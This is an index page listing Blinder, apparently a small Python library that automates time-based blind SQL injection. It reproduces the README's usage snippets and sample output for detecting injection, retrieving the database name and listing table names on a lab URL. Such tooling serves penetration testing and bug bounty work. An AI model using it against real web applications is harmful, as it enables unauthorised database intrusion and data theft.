Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/mhaskar/Blinder

A python library to automate time-based blind SQL injection
https://github.com/mhaskar/Blinder

Last synced: 5 days ago
JSON representation

A python library to automate time-based blind SQL injection

Host: GitHub
URL: https://github.com/mhaskar/Blinder
Owner: mhaskar
License: gpl-3.0
Created: 2019-06-04T00:23:28.000Z (over 5 years ago)
Default Branch: master
Last Pushed: 2019-09-15T07:42:53.000Z (about 5 years ago)
Last Synced: 2024-08-09T03:52:52.528Z (3 months ago)
Language: Python
Size: 27.3 KB
Stars: 49
Watchers: 5
Forks: 17
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

awesome-bugbounty-tools - Blinder - A python library to automate time-based blind SQL injection (Exploitation / SQL Injection)

README

        # Blinder

Blidner is a small python library to automate time-based blind SQL injection by using a pre defined queries as a functions to automate a rapid PoC development.

# Installation

You can install Blinder using the following command:

`pip install blinder`

Or by downloading the source and importing it manually to your project.

# Usage

To use blinder you need to import `Blinder` module then start using the main functions of Blinder.

You can use Blinder "with the current version" to do the following:

* Check for time based injection.

* Get database name.

* Get tables names.

**You can check for injection in a URL using the following code:**

```

#!/usr/bin/python

import Blinder

blind = Blinder.blinder(

    "http://sqli-lab/sql_injection/index.php?search=3",

    sleep=1

 )

print blind.check_injection()

```

The execution result will be:

```

root@kali:~/Desktop# python check.py

True

root@kali:~/Desktop#

```

**You can Get database name using the following code:**

```

#!/usr/bin/python

import Blinder

blind = Blinder.blinder(

    "http://sqli-lab/sql_injection/index.php?search=3",

    sleep=1

 )

print "Database name is : %s " % blind.get_database()

```

And the results will be:

```

root@kali:~/Desktop# python get-database.py

Database name is : db1

root@kali:~/Desktop#

```

**To get tables names you can use the following code:**

```

#!/usr/bin/python

import Blinder

blind = Blinder.blinder(

    "http://sqli-lab/sql_injection/index.php?search=3",

    sleep=1

 )

tables = blind.get_tables()

for table in tables:

    print table

```

And the results will be:

```

root@kali:~/Desktop# python get-tables.py

blogs

notes

root@kali:~/Desktop#

```

# TODO

A lot of features should be added soon like:

* [ ] the ability of adding customized query

* [ ] test injection points based on burp request

* [ ] extract tables/columns data